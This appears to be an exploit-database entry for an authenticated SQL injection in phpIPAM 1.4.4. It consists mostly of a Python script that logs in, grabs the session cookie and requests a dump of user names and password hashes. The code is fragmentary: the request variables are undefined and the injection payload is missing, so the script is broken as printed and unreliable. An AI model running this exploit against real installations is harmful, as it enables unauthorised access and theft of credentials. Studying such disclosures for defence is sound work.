Exploits / Vulnerability Discovered : 2022-01-25 |
Type : webapps |
Platform : php
This exploit / vulnerability Phpipam 1.4.4 sqli (authenticated) is for educational purposes only and if it is used you will do on your own risk!
target = args.url
user = args.user
password = args.password
def get_token():
u = f"{target}/app/login/login_check.php"
try:
r = requests.post(u, verify=False, timeout=10, headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}, data={"ipamusername":user, "ipampassword":password})
headers = r.headers['Set-Cookie']
headers_string = headers.split(';')
for s in headers_string:
if "phpipam" in s and "," in s: # double same cookie Check LoL
cookie = s.strip(',').lstrip()
return cookie
except Exception as e:
print(f"[+] {e}")
try:
r = requests.post(xpl, verify=False, timeout=10, headers=headers, data=data)
if "admin" in r.text or "rounds" in r.text:
print("[+] Vulnerable..\n\n")
print(f"> Users and hash passwords: \n\n{r.text}")
print("\n\n> DONE <")
except Exception as e:
print(f"[-] {e}")